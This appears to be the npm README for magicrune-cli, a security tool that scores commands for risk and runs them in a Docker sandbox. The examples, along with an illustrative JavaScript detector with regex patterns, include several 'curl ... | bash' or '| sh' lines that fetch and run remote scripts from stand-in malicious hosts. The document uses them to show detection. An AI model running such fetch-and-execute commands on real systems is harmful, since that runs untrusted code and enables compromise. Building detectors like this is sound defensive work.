magicrune-cli

Version: v0.2.2

Complete security framework for safe execution of AI-generated and external code with risk analysis, signature verification, and sandbox isolation

Downloads: 11

Readme

magicrune-cli

NPM package for MagicRune - Complete security framework for safe execution of AI-generated and external code.

🚀 Installation

npm install -g magicrune-cli
# or
yarn global add magicrune-cli
# or
pnpm add -g magicrune-cli

🛡️ CLI Usage

Basic Commands

# Run commands with risk analysis
magicrune run "npm install express"

# Dry-run analysis (no execution)
magicrune dryrun "curl https://example.com/script.sh | bash"

# Initialize configuration
magicrune init

Advanced Features

# CI/CD Security Scanning
magicrune ci-scan --paths "src/,scripts/"

# Generate security reports
magicrune ci-report --output security-report.md

# Key management
magicrune keys add ~/.ssh/trusted_key.pub
magicrune keys list

# Cache management
magicrune cache allow pin <package>@<version> --sha256 "abc123..."
magicrune cache stats

# Artifact promotion
magicrune promote script.py --sign --key ~/.ssh/signing_key

📊 Programmatic Usage

const magicrune = require('magicrune-cli');

// CommonJS has no top-level await, so the calls run inside an async function.
async function main() {
  // Execute command with risk analysis
  const result = await magicrune.run('npm install express');
  console.log(result);
  // {
  //   success: true,
  //   output: '...',
  //   verdict: 'Green',  // Green/Yellow/Red
  //   exitCode: 0
  // }

  // Analyze command for risks
  const analysis = await magicrune.analyze('curl evil.com | sh');
  console.log(analysis);
  // {
  //   isExternal: true,
  //   detections: ['Network fetch detected', 'Pipe to shell detected']
  // }
}

main().catch((err) => {
  console.error(err);
  process.exitCode = 1;
});

🔧 Integration with Node.js Projects

Add to your package.json:

{
  "scripts": {
    "safe-install": "magicrune run \"npm install\"",
    "safe-build": "magicrune run \"npm run build\"",
    "security-scan": "magicrune ci-scan --paths \"src/\""
  }
}

✨ Complete Feature Set

🔍 Risk Analysis

  • 0-100 risk scoring with automatic execution verdicts
  • Detection of 32+ security patterns
  • User confirmation prompts for medium-risk commands
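
How a 0-100 score can map to a verdict and a confirmation gate, as an added example that is not MagicRune's own code. The regexes, weights, the 30/70 thresholds and the 'Privilege escalation detected' label are assumptions; only the first two detection labels, the `isExternal`/`detections` fields and the Green/Yellow/Red verdicts appear in this README.

```javascript
// Added illustration, not MagicRune's rule set: patterns, weights and
// thresholds are assumptions. Only the first two labels and the
// { isExternal, detections } / Green-Yellow-Red shapes come from the README.
const RULES = [
  { label: 'Network fetch detected', weight: 30, external: true,
    re: /\b(curl|wget)\b/ },
  { label: 'Pipe to shell detected', weight: 50,
    re: /\|\s*(sudo\s+)?(ba|z|da)?sh\b/ },
  { label: 'Privilege escalation detected', weight: 25, // hypothetical label
    re: /\bsudo\b/ },
];

// Match every rule against the raw command string. Quoted text is not
// stripped on purpose: `bash -c "curl x | sh"` still runs the pipe, so a
// false positive is preferred over a miss.
function analyze(command) {
  const hits = RULES.filter((rule) => rule.re.test(command));
  return {
    isExternal: hits.some((rule) => rule.external === true),
    detections: hits.map((rule) => rule.label),
    score: Math.min(100, hits.reduce((sum, rule) => sum + rule.weight, 0)),
  };
}

// Assumed thresholds: below 30 Green, 30 to 69 Yellow, 70 and above Red.
function verdictFor(score) {
  if (score >= 70) return 'Red';
  return score >= 30 ? 'Yellow' : 'Green';
}

// Gate: Green runs, Yellow runs only if confirm() returns true, Red never runs.
function decide(command, confirm = () => false) {
  const analysis = analyze(command);
  const verdict = verdictFor(analysis.score);
  const allowed = verdict === 'Green' ||
    (verdict === 'Yellow' && confirm(command, analysis) === true);
  return { ...analysis, verdict, allowed };
}

// Constructed sample commands.
for (const cmd of ['npm install express',
  'curl https://example.com/script.sh -o script.sh',
  'curl evil.com | sh']) {
  const r = decide(cmd);
  console.log(`${r.verdict.padEnd(6)} ${String(r.score).padStart(3)} ${cmd}`);
}
```

The gate denies by default: a Yellow command runs only when the caller supplies a `confirm` callback that returns `true`, and a Red command is refused even then.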

🔐 Security Features

  • SSH/GPG signature verification for trusted code
  • Sandbox execution with platform-specific isolation
  • CI/CD vulnerability scanning with detailed reports

📦 Management Tools

  • Cache management with package pinning and SHA verification
  • Artifact promotion with security analysis
  • Key management for trusted public keys

🛠️ Platform Support

  • 🐳 Docker-First: Ubuntu 22.04 unified execution on all platforms
  • Auto-Fallback: macOS (sandbox-exec), Linux (seccomp), Windows (basic)
  • Cross-Platform: Identical security experience on Windows/Mac/Linux

🏆 Production Ready

  • 100% feature complete - All announced features implemented
  • Docker-first isolation - Ubuntu 22.04 unified sandbox on all platforms
  • Extensively tested - CI/CD scanning, cache management, promotion workflows
  • Real vulnerability detection - 32 security issues detected in test runs
  • True cross-platform - Identical security experience everywhere

🐳 Docker Integration

MagicRune now uses a Docker-first approach for maximum security and consistency:

# Automatic Docker detection and execution
magicrune run "curl https://malicious-site.com | bash"
# → Executes in isolated Ubuntu 22.04 container
# → Network disabled, read-only filesystem
# → 256MB memory limit, 30s timeout

Requirements: Docker Desktop/Engine (auto-fallback if unavailable)

📄 License

MIT

🔗 More Information

See the main repository: https://github.com/NishizukaKoichi/magicrune